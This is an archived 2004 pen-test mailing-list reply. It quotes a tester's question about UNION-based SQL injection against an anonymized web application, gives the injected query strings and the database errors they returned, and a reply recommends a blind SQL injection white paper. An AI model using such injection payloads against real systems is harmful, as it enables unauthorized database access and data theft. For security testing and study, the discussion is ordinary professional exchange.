RE: SQL Injection & ncompatible with int issue

From: Amichai Shulman (shulman_at_imperva.com)
Date: 06/13/04

Next message: Andre Ludwig: "Re: Wireless pentesting requirements"

Previous message: Kurt Grutzmacher: "Re: Lotus Notes .id file pw recover (Was Cached NT/W2k passwords)"
Maybe in reply to: Peter Bair: "SQL Injection & ncompatible with int issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Sun, 13 Jun 2004 13:15:00 +0200
To: <pen-test@securityfocus.com>, "Peter Bair" <peterbair100@hotmail.com>

Try "Blind Folder SQL Injection" it should do the trick. URL is
http://www.imperva.com/application_defense_center/white_papers/blind_sql
_server_injection.html

-----Original Message-----
From: Peter Bair [mailto:peterbair100@hotmail.com]
Sent: Thursday, June 10, 2004 1:51 AM
To: pen-test@securityfocus.com
Subject: SQL Injection & ncompatible with int issue

I am currently testing an application that reveals it tables. I know the
exact columns to perform a union but when I try the following:

xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1+--

RESULT:

Operand type clash: text is incompatible with int

So I will try the solution:

xxx.xxx.xxx/item='+union select
@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,"text"+--

RESULT:

Invalid column name 'text'.

I know that "text" is in the correct position and I tried 'text'.

Is this app safe or can I go further?

Thanks for any help.

Next message: Andre Ludwig: "Re: Wireless pentesting requirements"

Previous message: Kurt Grutzmacher: "Re: Lotus Notes .id file pw recover (Was Cached NT/W2k passwords)"
Maybe in reply to: Peter Bair: "SQL Injection & ncompatible with int issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]